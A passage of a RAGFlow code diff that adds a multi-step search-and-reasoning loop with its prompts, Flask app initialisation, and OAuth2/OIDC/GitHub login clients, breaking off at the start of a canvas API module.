                ck = self._kg_retrieve(question=search_query)
                if ck["content_with_weight"]:
                    kbinfos["chunks"].insert(0, ck)
        except Exception as e:
            logging.error(f"Knowledge graph retrieval error: {e}")

        return kbinfos

    def _update_chunk_info(self, chunk_info, kbinfos):
        """Update chunk information for citations"""
        if not chunk_info["chunks"]:
            # If this is the first retrieval, use the retrieval results directly
            for k in chunk_info.keys():
                chunk_info[k] = kbinfos[k]
        else:
            # Merge newly retrieved information, avoiding duplicates
            cids = [c["chunk_id"] for c in chunk_info["chunks"]]
            for c in kbinfos["chunks"]:
                if c["chunk_id"] not in cids:
                    chunk_info["chunks"].append(c)

            dids = [d["doc_id"] for d in chunk_info["doc_aggs"]]
            for d in kbinfos["doc_aggs"]:
                if d["doc_id"] not in dids:
                    chunk_info["doc_aggs"].append(d)

    def _extract_relevant_info(self, truncated_prev_reasoning, search_query, kbinfos):
        """Extract and summarize relevant information"""
        summary_think = ""
        for ans in self.chat_mdl.chat_streamly(
                RELEVANT_EXTRACTION_PROMPT.format(
                    prev_reasoning=truncated_prev_reasoning,
                    search_query=search_query,
                    document="\n".join(kb_prompt(kbinfos, 4096))
                ),
                [{"role": "user",
                  "content": f'Now you should analyze each web page and find helpful information based on the current search query "{search_query}" and previous reasoning steps.'}],
                {"temperature": 0.7}):
            ans = re.sub(r"^.*</think>", "", ans, flags=re.DOTALL)
            if not ans:
                continue
            summary_think = ans
            yield summary_think

        return summary_think

    def thinking(self, chunk_info: dict, question: str):
        executed_search_queries = []
        msg_history = [{"role": "user", "content": f'Question:\"{question}\"\n'}]
        all_reasoning_steps = []
        think = "<think>"

        for step_index in range(MAX_SEARCH_LIMIT + 1):
            # Check if the maximum search limit has been reached
            if step_index == MAX_SEARCH_LIMIT - 1:
                summary_think = f"\n{BEGIN_SEARCH_RESULT}\nThe maximum search limit is exceeded. You are not allowed to search.\n{END_SEARCH_RESULT}\n"
                yield {"answer": think + summary_think + "</think>", "reference": {}, "audio_binary": None}
                all_reasoning_steps.append(summary_think)
                msg_history.append({"role": "assistant", "content": summary_think})
                break

            # Step 1: Generate reasoning
            query_think = ""
            for ans in self._generate_reasoning(msg_history):
                query_think = ans
                yield {"answer": think + self._remove_query_tags(query_think) + "</think>", "reference": {}, "audio_binary": None}

            think += self._remove_query_tags(query_think)
            all_reasoning_steps.append(query_think)

            # Step 2: Extract search queries
            queries = self._extract_search_queries(query_think, question, step_index)
            if not queries and step_index > 0:
                # If this is not the first step and there are no queries, end the search process
                break

            # Process each search query
            for search_query in queries:
                logging.info(f"[THINK]Query: {step_index}. {search_query}")
                msg_history.append({"role": "assistant", "content": search_query})
                think += f"\n\n> {step_index + 1}. {search_query}\n\n"
                yield {"answer": think + "</think>", "reference": {}, "audio_binary": None}

                # Check whether the query has already been executed
                if search_query in executed_search_queries:
                    summary_think = f"\n{BEGIN_SEARCH_RESULT}\nYou have searched this query. Please refer to previous results.\n{END_SEARCH_RESULT}\n"
                    yield {"answer": think + summary_think + "</think>", "reference": {}, "audio_binary": None}
                    all_reasoning_steps.append(summary_think)
                    msg_history.append({"role": "user", "content": summary_think})
                    think += summary_think
                    continue

                executed_search_queries.append(search_query)

                # Step 3: Truncate previous reasoning steps
                truncated_prev_reasoning = self._truncate_previous_reasoning(all_reasoning_steps)

                # Step 4: Retrieve information
                kbinfos = self._retrieve_information(search_query)

                # Step 5: Update chunk information
                self._update_chunk_info(chunk_info, kbinfos)

                # Step 6: Extract relevant information
                think += "\n\n"
                summary_think = ""
                for ans in self._extract_relevant_info(truncated_prev_reasoning, search_query, kbinfos):
                    summary_think = ans
                    yield {"answer": think + self._remove_result_tags(summary_think) + "</think>", "reference": {}, "audio_binary": None}

                all_reasoning_steps.append(summary_think)
                msg_history.append(
                    {"role": "user", "content": f"\n\n{BEGIN_SEARCH_RESULT}{summary_think}{END_SEARCH_RESULT}\n\n"})
                think += self._remove_result_tags(summary_think)
                logging.info(f"[THINK]Summary: {step_index}. {summary_think}")

        yield think + "</think>"
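A hedged sketch of driving `thinking()`: it is a generator that streams dicts carrying a partial `answer` and finally yields the complete `<think>` transcript as a plain string. Here `researcher` is assumed to have been constructed with a real `LLMBundle` and retriever partials:

```python
# Hedged driver sketch; `researcher` is an assumed, already-configured
# DeepResearcher(chat_mdl, prompt_config, kb_retrieve=..., kg_retrieve=...).
chunk_info = {"chunks": [], "doc_aggs": []}
final_think = ""
for update in researcher.thinking(chunk_info, "Who directed Jaws, and where is he from?"):
    if isinstance(update, dict):
        print(update["answer"][-80:])  # streaming partial reasoning
    else:
        final_think = update           # the last yield is the full transcript string
print(len(chunk_info["chunks"]), "chunks collected for citations")
```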
agentic_reasoning/prompts.py (new file, 113 lines)
@@ -0,0 +1,113 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

BEGIN_SEARCH_QUERY = "<|begin_search_query|>"
END_SEARCH_QUERY = "<|end_search_query|>"
BEGIN_SEARCH_RESULT = "<|begin_search_result|>"
END_SEARCH_RESULT = "<|end_search_result|>"
MAX_SEARCH_LIMIT = 6

REASON_PROMPT = (
    "You are a reasoning assistant with the ability to perform dataset searches to help "
    "you answer the user's question accurately. You have special tools:\n\n"
    f"- To perform a search: write {BEGIN_SEARCH_QUERY} your query here {END_SEARCH_QUERY}.\n"
    f"Then, the system will search and analyze relevant content, then provide you with helpful information in the format {BEGIN_SEARCH_RESULT} ...search results... {END_SEARCH_RESULT}.\n\n"
    f"You can repeat the search process multiple times if necessary. The maximum number of search attempts is limited to {MAX_SEARCH_LIMIT}.\n\n"
    "Once you have all the information you need, continue your reasoning.\n\n"
    "-- Example 1 --\n"  ########################################
    "Question: \"Are both the directors of Jaws and Casino Royale from the same country?\"\n"
    "Assistant:\n"
    f"    {BEGIN_SEARCH_QUERY}Who is the director of Jaws?{END_SEARCH_QUERY}\n\n"
    "User:\n"
    f"    {BEGIN_SEARCH_RESULT}\nThe director of Jaws is Steven Spielberg...\n{END_SEARCH_RESULT}\n\n"
    "Continues reasoning with the new information.\n"
    "Assistant:\n"
    f"    {BEGIN_SEARCH_QUERY}Where is Steven Spielberg from?{END_SEARCH_QUERY}\n\n"
    "User:\n"
    f"    {BEGIN_SEARCH_RESULT}\nSteven Allan Spielberg is an American filmmaker...\n{END_SEARCH_RESULT}\n\n"
    "Continues reasoning with the new information...\n\n"
    "Assistant:\n"
    f"    {BEGIN_SEARCH_QUERY}Who is the director of Casino Royale?{END_SEARCH_QUERY}\n\n"
    "User:\n"
    f"    {BEGIN_SEARCH_RESULT}\nCasino Royale is a 2006 spy film directed by Martin Campbell...\n{END_SEARCH_RESULT}\n\n"
    "Continues reasoning with the new information...\n\n"
    "Assistant:\n"
    f"    {BEGIN_SEARCH_QUERY}Where is Martin Campbell from?{END_SEARCH_QUERY}\n\n"
    "User:\n"
    f"    {BEGIN_SEARCH_RESULT}\nMartin Campbell (born 24 October 1943) is a New Zealand film and television director...\n{END_SEARCH_RESULT}\n\n"
    "Continues reasoning with the new information...\n\n"
    "Assistant:\nIt's enough to answer the question\n"

    "-- Example 2 --\n"  #########################################
    "Question: \"When was the founder of craigslist born?\"\n"
    "Assistant:\n"
    f"    {BEGIN_SEARCH_QUERY}Who was the founder of craigslist?{END_SEARCH_QUERY}\n\n"
    "User:\n"
    f"    {BEGIN_SEARCH_RESULT}\nCraigslist was founded by Craig Newmark...\n{END_SEARCH_RESULT}\n\n"
    "Continues reasoning with the new information.\n"
    "Assistant:\n"
    f"    {BEGIN_SEARCH_QUERY}When was Craig Newmark born?{END_SEARCH_QUERY}\n\n"
    "User:\n"
    f"    {BEGIN_SEARCH_RESULT}\nCraig Newmark was born on December 6, 1952...\n{END_SEARCH_RESULT}\n\n"
    "Continues reasoning with the new information...\n\n"
    "Assistant:\nIt's enough to answer the question\n"
    "**Remember**:\n"
    "- You have a dataset to search, so you just provide a proper search query.\n"
    f"- Use {BEGIN_SEARCH_QUERY} to request a dataset search and end with {END_SEARCH_QUERY}.\n"
    "- The language of the query MUST be the same as that of the 'Question' or the 'search result'.\n"
    "- If no helpful information can be found, rewrite the search query with fewer, more precise keywords.\n"
    "- When done searching, continue your reasoning.\n\n"
    'Please answer the following question. You should think step by step to solve it.\n\n'
)

RELEVANT_EXTRACTION_PROMPT = """**Task Instruction:**

You are tasked with reading and analyzing web pages based on the following inputs: **Previous Reasoning Steps**, **Current Search Query**, and **Searched Web Pages**. Your objective is to extract relevant and helpful information for the **Current Search Query** from the **Searched Web Pages** and seamlessly integrate this information into the **Previous Reasoning Steps** to continue reasoning for the original question.

**Guidelines:**

1. **Analyze the Searched Web Pages:**
   - Carefully review the content of each searched web page.
   - Identify factual information that is relevant to the **Current Search Query** and can aid in the reasoning process for the original question.

2. **Extract Relevant Information:**
   - Select the information from the Searched Web Pages that directly contributes to advancing the **Previous Reasoning Steps**.
   - Ensure that the extracted information is accurate and relevant.

3. **Output Format:**
   - **If the web pages provide helpful information for the current search query:** Present the information beginning with `**Final Information**` as shown below.
   - The language of the output **MUST BE** the same as that of the 'Search Query' or the 'Web Pages'.

**Final Information**

[Helpful information]

   - **If the web pages do not provide any helpful information for the current search query:** Output the following text.

**Final Information**

No helpful information found.

**Inputs:**
- **Previous Reasoning Steps:**
{prev_reasoning}

- **Current Search Query:**
{search_query}

- **Searched Web Pages:**
{document}

"""
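An illustrative sketch of the search-tag protocol defined above: queries are embedded between the BEGIN/END markers and pulled back out with a regex, similar in spirit to `rag.nlp.extract_between` (an assumption about that helper's semantics):

```python
# Self-contained illustration of round-tripping queries through the tag protocol.
import re

BEGIN_SEARCH_QUERY = "<|begin_search_query|>"
END_SEARCH_QUERY = "<|end_search_query|>"

def extract_queries(text: str) -> list[str]:
    pattern = re.escape(BEGIN_SEARCH_QUERY) + r"(.*?)" + re.escape(END_SEARCH_QUERY)
    return [m.strip() for m in re.findall(pattern, text, flags=re.DOTALL)]

thought = f"I should check. {BEGIN_SEARCH_QUERY}Who directed Jaws?{END_SEARCH_QUERY}"
print(extract_queries(thought))  # ['Who directed Jaws?']
```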
@@ -0,0 +1,18 @@
#
# Copyright 2025 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

from beartype.claw import beartype_this_package
beartype_this_package()
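`beartype_this_package()` installs import hooks that enforce type hints at call time across the whole package. A small illustration of the per-function decorator form it generalizes:

```python
# Illustration of the runtime checking beartype_this_package() applies
# package-wide: the decorator form rejects arguments that violate the hints.
from beartype import beartype

@beartype
def chunk(text: str, size: int) -> list[str]:
    return [text[i:i + size] for i in range(0, len(text), size)]

print(chunk("hello world", 4))  # fine
try:
    chunk("hello world", "4")   # wrong type for `size`
except Exception as exc:        # beartype raises a call-hint violation
    print(type(exc).__name__)
```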
@@ -1,120 +1,178 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import logging
from importlib.util import module_from_spec, spec_from_file_location
from pathlib import Path
from flask import Blueprint, Flask
from werkzeug.wrappers.request import Request
from flask_cors import CORS
from flasgger import Swagger
from itsdangerous.url_safe import URLSafeTimedSerializer as Serializer

from api.db import StatusEnum
from api.db.db_models import close_connection
from api.db.services import UserService
from api.utils import CustomJSONEncoder, commands

from flask_session import Session
from flask_login import LoginManager
from api import settings
from api.utils.api_utils import server_error_response
from api.constants import API_VERSION

__all__ = ["app"]

Request.json = property(lambda self: self.get_json(force=True, silent=True))

app = Flask(__name__)

# Add this at the beginning of your file to configure Swagger UI
swagger_config = {
    "headers": [],
    "specs": [
        {
            "endpoint": "apispec",
            "route": "/apispec.json",
            "rule_filter": lambda rule: True,  # Include all endpoints
            "model_filter": lambda tag: True,  # Include all models
        }
    ],
    "static_url_path": "/flasgger_static",
    "swagger_ui": True,
    "specs_route": "/apidocs/",
}

swagger = Swagger(
    app,
    config=swagger_config,
    template={
        "swagger": "2.0",
        "info": {
            "title": "RAGFlow API",
            "description": "",
            "version": "1.0.0",
        },
        "securityDefinitions": {
            "ApiKeyAuth": {"type": "apiKey", "name": "Authorization", "in": "header"}
        },
    },
)

CORS(app, supports_credentials=True, max_age=2592000)
app.url_map.strict_slashes = False
app.json_encoder = CustomJSONEncoder
app.errorhandler(Exception)(server_error_response)

## convenient for dev and debug
# app.config["LOGIN_DISABLED"] = True
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
app.config["MAX_CONTENT_LENGTH"] = int(
    os.environ.get("MAX_CONTENT_LENGTH", 1024 * 1024 * 1024)
)

Session(app)
login_manager = LoginManager()
login_manager.init_app(app)

commands.register_commands(app)


def search_pages_path(pages_dir):
    app_path_list = [
        path for path in pages_dir.glob("*_app.py") if not path.name.startswith(".")
    ]
    api_path_list = [
        path for path in pages_dir.glob("*sdk/*.py") if not path.name.startswith(".")
    ]
    app_path_list.extend(api_path_list)
    return app_path_list


def register_page(page_path):
    path = f"{page_path}"

    page_name = page_path.stem.removesuffix("_app")
    module_name = ".".join(
        page_path.parts[page_path.parts.index("api"): -1] + (page_name,)
    )

    spec = spec_from_file_location(module_name, page_path)
    page = module_from_spec(spec)
    page.app = app
    page.manager = Blueprint(page_name, module_name)
    sys.modules[module_name] = page
    spec.loader.exec_module(page)
    page_name = getattr(page, "page_name", page_name)
    sdk_path = "\\sdk\\" if sys.platform.startswith("win") else "/sdk/"
    url_prefix = (
        f"/api/{API_VERSION}" if sdk_path in path else f"/{API_VERSION}/{page_name}"
    )

    app.register_blueprint(page.manager, url_prefix=url_prefix)
    return url_prefix


pages_dir = [
    Path(__file__).parent,
    Path(__file__).parent.parent / "api" / "apps",
    Path(__file__).parent.parent / "api" / "apps" / "sdk",
]

client_urls_prefix = [
    register_page(path) for dir in pages_dir for path in search_pages_path(dir)
]


@login_manager.request_loader
def load_user(web_request):
    jwt = Serializer(secret_key=settings.SECRET_KEY)
    authorization = web_request.headers.get("Authorization")
    if authorization:
        try:
            access_token = str(jwt.loads(authorization))

            if not access_token or not access_token.strip():
                logging.warning("Authentication attempt with empty access token")
                return None

            # Access tokens should be UUIDs (32 hex characters)
            if len(access_token.strip()) < 32:
                logging.warning(f"Authentication attempt with invalid token format: {len(access_token)} chars")
                return None

            user = UserService.query(
                access_token=access_token, status=StatusEnum.VALID.value
            )
            if user:
                if not user[0].access_token or not user[0].access_token.strip():
                    logging.warning(f"User {user[0].email} has empty access_token in database")
                    return None
                return user[0]
            else:
                return None
        except Exception as e:
            logging.warning(f"load_user got exception {e}")
            return None
    else:
        return None


@app.teardown_request
def _db_close(exc):
    close_connection()
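A sketch of the token handling in `load_user` above: the `Authorization` header carries an itsdangerous-serialized access token, unwrapped with the same `SECRET_KEY`. The key and token below are placeholders:

```python
# Round-trip of the header token load_user expects; key/token are placeholders.
from itsdangerous.url_safe import URLSafeTimedSerializer as Serializer

jwt = Serializer(secret_key="change-me")
authorization = jwt.dumps("0f1e2d3c4b5a69788796a5b4c3d2e1f0")  # what a client would send
access_token = str(jwt.loads(authorization))                   # what load_user recovers
assert len(access_token.strip()) >= 32                         # the UUID-length sanity check
```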
api/apps/api_app.py (1172 lines): file diff suppressed because it is too large.
api/apps/auth/README.md (new file, 76 lines)
@@ -0,0 +1,76 @@
# Auth

The Auth module provides implementations of OAuth2 and OpenID Connect (OIDC) authentication for integration with third-party identity providers.

**Features**

- Supports both OAuth2 and OIDC authentication protocols
- Automatic OIDC configuration discovery (via `/.well-known/openid-configuration`)
- JWT token validation
- Unified user information handling

## Usage

```python
# OAuth2 configuration
oauth_config = {
    "type": "oauth2",
    "client_id": "your_client_id",
    "client_secret": "your_client_secret",
    "authorization_url": "https://your-oauth-provider.com/oauth/authorize",
    "token_url": "https://your-oauth-provider.com/oauth/token",
    "userinfo_url": "https://your-oauth-provider.com/oauth/userinfo",
    "redirect_uri": "https://your-app.com/v1/user/oauth/callback/<channel>"
}

# OIDC configuration
oidc_config = {
    "type": "oidc",
    "issuer": "https://your-oauth-provider.com/oidc",
    "client_id": "your_client_id",
    "client_secret": "your_client_secret",
    "redirect_uri": "https://your-app.com/v1/user/oauth/callback/<channel>"
}

# GitHub OAuth configuration
github_config = {
    "type": "github",
    "client_id": "your_client_id",
    "client_secret": "your_client_secret",
    "redirect_uri": "https://your-app.com/v1/user/oauth/callback/<channel>"
}

# Get a client instance
client = get_auth_client(oauth_config)
```

### Authentication Flow

1. Get the authorization URL:
```python
auth_url = client.get_authorization_url()
```

2. After user authorization, exchange the authorization code for a token:
```python
token_response = client.exchange_code_for_token(authorization_code)
access_token = token_response["access_token"]
```

3. Fetch user information:
```python
user_info = client.fetch_user_info(access_token)
```

## User Information Structure

All authentication methods return user information following this structure:

```python
{
    "email": "user@example.com",
    "username": "username",
    "nickname": "User Name",
    "avatar_url": "https://example.com/avatar.jpg"
}
```
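For orientation, a minimal sketch wiring the three steps into a Flask callback route; the route paths and state handling here are illustrative, not the module's actual wiring:

```python
from flask import Flask, redirect, request

from api.apps.auth import get_auth_client

app = Flask(__name__)
client = get_auth_client(oauth_config)  # any of the configurations above


@app.route("/login")
def login():
    # Step 1: send the user to the provider's consent page
    return redirect(client.get_authorization_url(state="random-csrf-state"))


@app.route("/v1/user/oauth/callback/<channel>")
def callback(channel):
    # Steps 2 and 3: trade the code for a token, then fetch the user profile
    token_response = client.exchange_code_for_token(request.args["code"])
    user_info = client.fetch_user_info(token_response["access_token"])
    return user_info.to_dict()
```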
api/apps/auth/__init__.py (new file, 40 lines)
@@ -0,0 +1,40 @@
#
# Copyright 2025 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

from .oauth import OAuthClient
from .oidc import OIDCClient
from .github import GithubOAuthClient


CLIENT_TYPES = {
    "oauth2": OAuthClient,
    "oidc": OIDCClient,
    "github": GithubOAuthClient
}


def get_auth_client(config) -> OAuthClient:
    channel_type = str(config.get("type", "")).lower()
    if channel_type == "":
        # Infer the protocol when no explicit type is given: an issuer implies OIDC.
        if config.get("issuer"):
            channel_type = "oidc"
        else:
            channel_type = "oauth2"
    client_class = CLIENT_TYPES.get(channel_type)
    if not client_class:
        raise ValueError(f"Unsupported type: {channel_type}")

    return client_class(config)
api/apps/auth/github.py (new file, 63 lines)
@@ -0,0 +1,63 @@
#
# Copyright 2025 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import requests
from .oauth import OAuthClient, UserInfo


class GithubOAuthClient(OAuthClient):
    def __init__(self, config):
        """
        Initialize the GithubOAuthClient with the provider's configuration.
        """
        config.update({
            "authorization_url": "https://github.com/login/oauth/authorize",
            "token_url": "https://github.com/login/oauth/access_token",
            "userinfo_url": "https://api.github.com/user",
            "scope": "user:email"
        })
        super().__init__(config)

    def fetch_user_info(self, access_token, **kwargs):
        """
        Fetch GitHub user info, including the primary email address.
        """
        user_info = {}
        try:
            headers = {"Authorization": f"Bearer {access_token}"}
            # user info
            response = requests.get(self.userinfo_url, headers=headers, timeout=self.http_request_timeout)
            response.raise_for_status()
            user_info.update(response.json())
            # email info
            response = requests.get(self.userinfo_url + "/emails", headers=headers, timeout=self.http_request_timeout)
            response.raise_for_status()
            email_info = response.json()
            # Guard against accounts without a primary email instead of subscripting None.
            primary_email = next((email for email in email_info if email.get("primary")), None)
            user_info["email"] = primary_email["email"] if primary_email else None
            return self.normalize_user_info(user_info)
        except requests.exceptions.RequestException as e:
            raise ValueError(f"Failed to fetch github user info: {e}")

    def normalize_user_info(self, user_info):
        email = user_info.get("email")
        username = user_info.get("login", str(email).split("@")[0])
        nickname = user_info.get("name", username)
        avatar_url = user_info.get("avatar_url", "")
        return UserInfo(email=email, username=username, nickname=nickname, avatar_url=avatar_url)
api/apps/auth/oauth.py (new file, 110 lines)
@@ -0,0 +1,110 @@
#
# Copyright 2025 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import requests
import urllib.parse


class UserInfo:
    def __init__(self, email, username, nickname, avatar_url):
        self.email = email
        self.username = username
        self.nickname = nickname
        self.avatar_url = avatar_url

    def to_dict(self):
        return {key: value for key, value in self.__dict__.items()}


class OAuthClient:
    def __init__(self, config):
        """
        Initialize the OAuthClient with the provider's configuration.
        """
        self.client_id = config["client_id"]
        self.client_secret = config["client_secret"]
        self.authorization_url = config["authorization_url"]
        self.token_url = config["token_url"]
        self.userinfo_url = config["userinfo_url"]
        self.redirect_uri = config["redirect_uri"]
        self.scope = config.get("scope", None)

        self.http_request_timeout = 7

    def get_authorization_url(self, state=None):
        """
        Generate the authorization URL for user login.
        """
        params = {
            "client_id": self.client_id,
            "redirect_uri": self.redirect_uri,
            "response_type": "code",
        }
        if self.scope:
            params["scope"] = self.scope
        if state:
            params["state"] = state
        authorization_url = f"{self.authorization_url}?{urllib.parse.urlencode(params)}"
        return authorization_url

    def exchange_code_for_token(self, code):
        """
        Exchange authorization code for access token.
        """
        try:
            payload = {
                "client_id": self.client_id,
                "client_secret": self.client_secret,
                "code": code,
                "redirect_uri": self.redirect_uri,
                "grant_type": "authorization_code"
            }
            response = requests.post(
                self.token_url,
                data=payload,
                headers={"Accept": "application/json"},
                timeout=self.http_request_timeout
            )
            response.raise_for_status()
            return response.json()
        except requests.exceptions.RequestException as e:
            raise ValueError(f"Failed to exchange authorization code for token: {e}")

    def fetch_user_info(self, access_token, **kwargs):
        """
        Fetch user information using access token.
        """
        try:
            headers = {"Authorization": f"Bearer {access_token}"}
            response = requests.get(self.userinfo_url, headers=headers, timeout=self.http_request_timeout)
            response.raise_for_status()
            user_info = response.json()
            return self.normalize_user_info(user_info)
        except requests.exceptions.RequestException as e:
            raise ValueError(f"Failed to fetch user info: {e}")

    def normalize_user_info(self, user_info):
        email = user_info.get("email")
        username = user_info.get("username", str(email).split("@")[0])
        nickname = user_info.get("nickname", username)
        avatar_url = user_info.get("avatar_url", None)
        if avatar_url is None:
            avatar_url = user_info.get("picture", "")
        return UserInfo(email=email, username=username, nickname=nickname, avatar_url=avatar_url)
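A minimal sketch of how OAuthClient is meant to be driven end to end. The provider URLs, credentials, and the handle_callback helper are placeholders, not part of this file, and it assumes the provider returns access_token in the token JSON:

# Hypothetical wiring of OAuthClient; all URLs and secrets are placeholders.
config = {
    "client_id": "my-client-id",
    "client_secret": "my-client-secret",
    "authorization_url": "https://provider.example.com/oauth/authorize",
    "token_url": "https://provider.example.com/oauth/token",
    "userinfo_url": "https://provider.example.com/oauth/userinfo",
    "redirect_uri": "https://myapp.example.com/oauth/callback",
    "scope": "openid profile email",
}

client = OAuthClient(config)

# Step 1: redirect the user to the provider; `state` guards against CSRF.
login_url = client.get_authorization_url(state="random-state-token")

# Step 2: in the callback, trade the code for tokens and normalize the user.
def handle_callback(code):  # hypothetical callback handler
    token_response = client.exchange_code_for_token(code)
    user = client.fetch_user_info(token_response["access_token"])
    return user.to_dict()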
api/apps/auth/oidc.py  (new file, 99 lines)
@@ -0,0 +1,99 @@
#
# Copyright 2025 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import jwt
import requests
from .oauth import OAuthClient


class OIDCClient(OAuthClient):
    def __init__(self, config):
        """
        Initialize the OIDCClient with the provider's configuration.
        Use `issuer` as the single source of truth for configuration discovery.
        """
        self.issuer = config.get("issuer")
        if not self.issuer:
            raise ValueError("Missing issuer in configuration.")

        oidc_metadata = self._load_oidc_metadata(self.issuer)
        config.update({
            'issuer': oidc_metadata['issuer'],
            'jwks_uri': oidc_metadata['jwks_uri'],
            'authorization_url': oidc_metadata['authorization_endpoint'],
            'token_url': oidc_metadata['token_endpoint'],
            'userinfo_url': oidc_metadata['userinfo_endpoint']
        })

        super().__init__(config)
        self.issuer = config['issuer']
        self.jwks_uri = config['jwks_uri']

    def _load_oidc_metadata(self, issuer):
        """
        Load OIDC metadata from `/.well-known/openid-configuration`.
        """
        try:
            metadata_url = f"{issuer}/.well-known/openid-configuration"
            response = requests.get(metadata_url, timeout=7)
            response.raise_for_status()
            return response.json()
        except requests.exceptions.RequestException as e:
            raise ValueError(f"Failed to fetch OIDC metadata: {e}")

    def parse_id_token(self, id_token):
        """
        Parse and validate OIDC ID Token (JWT format) with signature verification.
        """
        try:
            # Decode the JWT header without verifying the signature
            headers = jwt.get_unverified_header(id_token)

            # OIDC usually uses `RS256` for signing
            alg = headers.get("alg", "RS256")

            # Use PyJWT's PyJWKClient to fetch the JWKS and find the signing key
            jwks_cli = jwt.PyJWKClient(self.jwks_uri)
            signing_key = jwks_cli.get_signing_key_from_jwt(id_token).key

            # Decode and verify the signature
            decoded_token = jwt.decode(
                id_token,
                key=signing_key,
                algorithms=[alg],
                audience=str(self.client_id),
                issuer=self.issuer,
            )
            return decoded_token
        except Exception as e:
            raise ValueError(f"Error parsing ID Token: {e}")

    def fetch_user_info(self, access_token, id_token=None, **kwargs):
        """
        Fetch user info.
        """
        user_info = {}
        if id_token:
            user_info = self.parse_id_token(id_token)
        user_info.update(super().fetch_user_info(access_token).to_dict())
        return self.normalize_user_info(user_info)

    def normalize_user_info(self, user_info):
        return super().normalize_user_info(user_info)
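Because OIDCClient.__init__ fills in the endpoint URLs from the issuer's discovery document, its config can stay much smaller than the plain OAuth one. A sketch with a placeholder issuer and credentials:

# Only issuer, client credentials, and redirect_uri are required; the rest is
# discovered from https://<issuer>/.well-known/openid-configuration.
oidc_config = {
    "issuer": "https://accounts.example.com",
    "client_id": "my-client-id",
    "client_secret": "my-client-secret",
    "redirect_uri": "https://myapp.example.com/oidc/callback",
    "scope": "openid profile email",
}

oidc_client = OIDCClient(oidc_config)

# When an ID token is present it is verified against the provider's JWKS and
# its claims are merged with the userinfo response.
def handle_oidc_callback(code):  # hypothetical callback handler
    tokens = oidc_client.exchange_code_for_token(code)
    user = oidc_client.fetch_user_info(tokens["access_token"], id_token=tokens.get("id_token"))
    return user.to_dict()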
api/apps/canvas_app.py  (new file, 466 lines)
@@ -0,0 +1,466 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import logging
import re
import sys
from functools import partial

import trio
from flask import request, Response
from flask_login import login_required, current_user

from agent.component import LLM
from api.db import FileType
from api.db.services.canvas_service import CanvasTemplateService, UserCanvasService, API4ConversationService
from api.db.services.document_service import DocumentService
from api.db.services.file_service import FileService
from api.db.services.user_service import TenantService
from api.db.services.user_canvas_version import UserCanvasVersionService
from api.settings import RetCode
from api.utils import get_uuid
from api.utils.api_utils import get_json_result, server_error_response, validate_request, get_data_error_result, \
    get_error_data_result
from agent.canvas import Canvas
from peewee import MySQLDatabase, PostgresqlDatabase
from api.db.db_models import APIToken
import time

from api.utils.file_utils import filename_type, read_potential_broken_pdf
from rag.utils.redis_conn import REDIS_CONN
@manager.route('/templates', methods=['GET'])  # noqa: F821
@login_required
def templates():
    return get_json_result(data=[c.to_dict() for c in CanvasTemplateService.get_all()])


@manager.route('/list', methods=['GET'])  # noqa: F821
@login_required
def canvas_list():
